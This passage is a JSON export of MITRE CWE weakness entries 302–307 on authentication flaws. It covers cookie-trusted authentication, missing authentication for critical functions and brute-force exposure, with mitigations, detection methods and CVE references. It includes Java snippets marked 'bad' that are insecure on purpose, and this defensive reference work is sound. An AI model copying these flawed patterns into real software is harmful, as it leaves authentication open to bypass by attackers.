Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Description, Maintenance_Notes, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Observed_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Description, Other_Notes"}]}},"302":{"attr":{"@_ID":"302","@_Name":"Authentication Bypass by Assumed-Immutable Data","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The authentication scheme or implementation uses key data elements that are assumed to be immutable, but can be controlled or modified by the attacker.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"287","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"807","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic."},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Bypass Protection Mechanism"}},"Potential_Mitigations":{"Mitigation":{"Phase":["Architecture and Design","Operation","Implementation"],"Description":"Implement proper protection for immutable data (e.g. environment variable, hidden form fields, etc.)"}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"In the following example, an \\"authenticated\\" cookie is used to determine whether or not a user should be granted access to a system.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"boolean authenticated = new Boolean(getCookieValue(\\"authenticated\\")).booleanValue();if (authenticated) {}","xhtml:br":"","xhtml:div":{"#text":"...","attr":{"@_style":"margin-left:10px;"}}}},"Body_Text":"Modifying the value of a cookie on the client-side is trivial, but many developers assume that cookies are essentially immutable."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-0367","Description":"DebPloit","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0367"},{"Reference":"CVE-2004-0261","Description":"Web auth","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0261"},{"Reference":"CVE-2002-1730","Description":"Authentication bypass by setting certain cookies to \\"true\\".","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1730"},{"Reference":"CVE-2002-1734","Description":"Authentication bypass by setting certain cookies to \\"true\\".","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1734"},{"Reference":"CVE-2002-2064","Description":"Admin access by setting a cookie.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2064"},{"Reference":"CVE-2002-2054","Description":"Gain privileges by setting cookie.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2054"},{"Reference":"CVE-2004-1611","Description":"Product trusts authentication information in cookie.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1611"},{"Reference":"CVE-2005-1708","Description":"Authentication bypass by setting admin-testing variable to true.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1708"},{"Reference":"CVE-2005-1787","Description":"Bypass auth and gain privileges by setting a variable.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1787"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Authentication Bypass via Assumed-Immutable Data"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A1","Entry_Name":"Unvalidated Input","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"SEC02-J","Entry_Name":"Do not base security checks on untrusted sources"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"10"}},{"attr":{"@_CAPEC_ID":"13"}},{"attr":{"@_CAPEC_ID":"21"}},{"attr":{"@_CAPEC_ID":"274"}},{"attr":{"@_CAPEC_ID":"31"}},{"attr":{"@_CAPEC_ID":"39"}},{"attr":{"@_CAPEC_ID":"45"}},{"attr":{"@_CAPEC_ID":"77"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Demonstrative_Examples, Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}]}},"303":{"attr":{"@_ID":"303","@_Name":"Incorrect Implementation of Authentication Algorithm","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The requirements for the software dictate the use of an established authentication algorithm, but the implementation of the algorithm is incorrect.","Extended_Description":"This incorrect implementation may allow authentication to be bypassed.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"287","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Bypass Protection Mechanism"}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2003-0750","Description":"Conditional should have been an \'or\' not an \'and\'.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0750"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Authentication Logic Error"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"90"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Authentication Logic Error","attr":{"@_Date":"2008-04-11"}},{"#text":"Improper Implementation of Authentication Algorithm","attr":{"@_Date":"2009-05-27"}}]}},"304":{"attr":{"@_ID":"304","@_Name":"Missing Critical Step in Authentication","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software implements an authentication technique, but it skips a step that weakens the technique.","Extended_Description":"Authentication techniques should follow the algorithms that define them exactly, otherwise authentication can be bypassed or more easily subjected to brute force attacks.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"287","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"573","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Common_Consequences":{"Consequence":{"Scope":["Access Control","Integrity","Confidentiality"],"Impact":["Bypass Protection Mechanism","Gain Privileges or Assume Identity","Read Application Data","Execute Unauthorized Code or Commands"],"Note":"This weakness can lead to the exposure of resources or functionality to unintended actors, possibly providing attackers with sensitive information or allowing attackers to execute arbitrary code."}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2004-2163","Description":"Shared secret not verified in a RADIUS response packet, allowing authentication bypass by spoofing server replies.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2163"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Missing Critical Step in Authentication"}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"305":{"attr":{"@_ID":"305","@_Name":"Authentication Bypass by Primary Weakness","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The authentication algorithm is sound, but the implemented mechanism can be bypassed as the result of a separate weakness that is primary to the authentication error.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"287","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Bypass Protection Mechanism"}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-1374","Description":"The provided password is only compared against the first character of the real password.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1374"},{"Reference":"CVE-2000-0979","Description":"The password is not properly checked, which allows remote attackers to bypass access controls by sending a 1-byte password that matches the first character of the real password.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0979"},{"Reference":"CVE-2001-0088","Description":"Chain: Forum software does not properly initialize an array, which inadvertently sets the password to a single character, allowing remote attackers to easily guess the password and gain administrative privileges.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0088"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Authentication Bypass by Primary Weakness"}},"Notes":{"Note":{"#text":"Most \\"authentication bypass\\" errors are resultant, not primary.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Relationship_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"306":{"attr":{"@_ID":"306","@_Name":"Missing Authentication for Critical Function","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not perform any authentication for functionality that requires a provable user identity or consumes a significant amount of resources.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"287","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"287","@_View_ID":"1003","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."}},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":["Access Control","Other"],"Impact":["Gain Privileges or Assume Identity","Other"],"Note":"Exposing critical functionality essentially provides an attacker with the privilege level of that functionality. The consequences will depend on the associated functionality, but they can range from reading or modifying sensitive data, access to administrative or other privileged functionality, or possibly even execution of arbitrary code."}},"Detection_Methods":{"Detection_Method":[{"attr":{"@_Detection_Method_ID":"DM-7.2"},"Method":"Manual Analysis","Description":{"xhtml:p":["This weakness can be detected using tools and techniques that require manual (human) analysis, such as penetration testing, threat modeling, and interactive tools that allow the tester to record and modify an active session.","Specifically, manual static analysis is useful for evaluating the correctness of custom authentication mechanisms."]},"Effectiveness_Notes":"These may be more effective than strictly automated techniques. This is especially the case with weaknesses that are related to design and business rules."},{"attr":{"@_Detection_Method_ID":"DM-6.1"},"Method":"Automated Static Analysis","Description":{"xhtml:p":["Automated static analysis is useful for detecting commonly-used idioms for authentication. A tool may be able to analyze related configuration files, such as .htaccess in Apache web servers, or detect the usage of commonly-used authentication libraries.","Generally, automated static analysis tools have difficulty detecting custom authentication schemes. In addition, the software\'s design may include some functionality that is accessible to any user and does not require an established identity; an automated technique that detects the absence of authentication may report false positives."]},"Effectiveness":"Limited"},{"Method":"Manual Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Binary / Bytecode disassembler - then use manual analysis for vulnerabilities & anomalies"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Automated Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Web Application Scanner","Web Services Scanner","Database Scanners"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Host Application Interface Scanner","Fuzz Tester","Framework-based Fuzzer"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Focused Manual Spotcheck - Focused manual analysis of source","Manual Source Code Review (not inspections)"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Automated Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Source code Weakness Analyzer","Context-configured Source Code Weakness Analyzer"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)","Formal Methods / Correct-By-Construction"]}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Attack Modeling"}}]}},"Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":{"xhtml:p":["Divide the software into anonymous, normal, privileged, and administrative areas. Identify which of these areas require a proven user identity, and use a centralized authentication capability.","Identify all potential communication channels, or other means of interaction with the software, to ensure that all channels are appropriately protected. Developers sometimes perform authentication at the primary channel, but open up a secondary channel that is assumed to be private. For example, a login mechanism may be listening on one network port, but after successful authentication, it may open up a second port where it waits for the connection, but avoids authentication because it assumes that only the authenticated party will connect to the port.","In general, if the software or protocol allows a single session or user state to persist across multiple connections or channels, authentication and appropriate credential management need to be used throughout."]}},{"attr":{"@_Mitigation_ID":"MIT-15"},"Phase":"Architecture and Design","Description":"For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server."},{"Phase":"Architecture and Design","Description":{"xhtml:p":["Where possible, avoid implementing custom authentication routines and consider using authentication capabilities as provided by the surrounding framework, operating system, or environment. These may make it easier to provide a clear separation between authentication tasks and authorization tasks.","In environments such as the World Wide Web, the line between authentication and authorization is sometimes blurred. If custom authentication routines are required instead of those provided by the server, then these routines must be applied to every single page, since these pages could be requested directly."]}},{"attr":{"@_Mitigation_ID":"MIT-4.5"},"Phase":"Architecture and Design","Strategy":"Libraries or Frameworks","Description":{"xhtml:p":["Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.","For example, consider using libraries with authentication capabilities such as OpenSSL or the ESAPI Authenticator [REF-45]."]}}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"In the following Java example the method createBankAccount is used to create a BankAccount object for a bank management application.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public BankAccount createBankAccount(String accountNumber, String accountType,String accountName, String accountSSN, double balance) {}","xhtml:br":["",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"BankAccount account = new BankAccount();account.setAccountNumber(accountNumber);account.setAccountType(accountType);account.setAccountOwnerName(accountName);account.setAccountOwnerSSN(accountSSN);account.setBalance(balance);return account;","xhtml:br":["","","","","","",""]}}}},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"private boolean isUserAuthentic = false;public boolean authenticateUser(String username, String password) {}public BankAccount createNewBankAccount(String accountNumber, String accountType,String accountName, String accountSSN, double balance) {}","xhtml:br":["","","","","","","","","",""],"xhtml:i":["// authenticate user,","// if user is authenticated then set variable to true","// otherwise set variable to false"],"xhtml:div":[{"#text":"...","attr":{"@_style":"margin-left:10px;"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"BankAccount account = null;if (isUserAuthentic) {}return account;","xhtml:br":["","",""],"xhtml:div":{"#text":"account = new BankAccount();account.setAccountNumber(accountNumber);account.setAccountType(accountType);account.setAccountOwnerName(accountName);account.setAccountOwnerSSN(accountSSN);account.setBalance(balance);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","",""]}}}]}}],"Body_Text":["However, there is no authentication mechanism to ensure that the user creating this bank account object has the authority to create new bank accounts. Some authentication mechanisms should be used to verify that the user has the authority to create bank account objects.","The following Java code includes a boolean variable and method for authenticating a user. If the user has not been authenticated then the createBankAccount will not create the bank account object."]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-1810","Description":"MFV. Access TFTP server without authentication and obtain configuration file with sensitive plaintext information.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1810"},{"Reference":"CVE-2008-6827","Description":"Agent software running at privileges does not authenticate incoming requests over an unprotected channel, allowing a Shatter\\" attack.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-6827"},{"Reference":"CVE-2004-0213","Description":"Product enforces restrictions through a GUI but not through privileged APIs.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0213"},{"Reference":"CVE-2020-15483","Description":"monitor device allows access to physical UART debug port without authentication","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15483"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"No Authentication for Critical Function"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP31","Entry_Name":"Missing authentication"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"12"}},{"attr":{"@_CAPEC_ID":"166"}},{"attr":{"@_CAPEC_ID":"36"}},{"attr":{"@_CAPEC_ID":"62"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 2, "Common Vulnerabilities of Authentication," Page 36"}},{"attr":{"@_External_Reference_ID":"REF-257"}},{"attr":{"@_External_Reference_ID":"REF-45"}}]},"Notes":{"Note":{"#text":"This is separate from \\"bypass\\" issues in which authentication exists, but is faulty.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Relationship_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Detection_Factors, Likelihood_of_Exploit, Name, Observed_Examples, Potential_Mitigations, References, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Common_Consequences, Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Potential_Mitigations, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Detection_Factors, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Likelihood_of_Exploit, Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Observed_Examples, Relationships"}],"Previous_Entry_Name":{"#text":"No Authentication for Critical Function","attr":{"@_Date":"2010-02-16"}}}},"307":{"attr":{"@_ID":"307","@_Name":"Improper Restriction of Excessive Authentication Attempts","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not implement sufficient measures to prevent multiple failed authentication attempts within in a short time frame, making it more susceptible to brute force attacks.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"287","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"287","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"799","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic."}},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Bypass Protection Mechanism","Note":"An 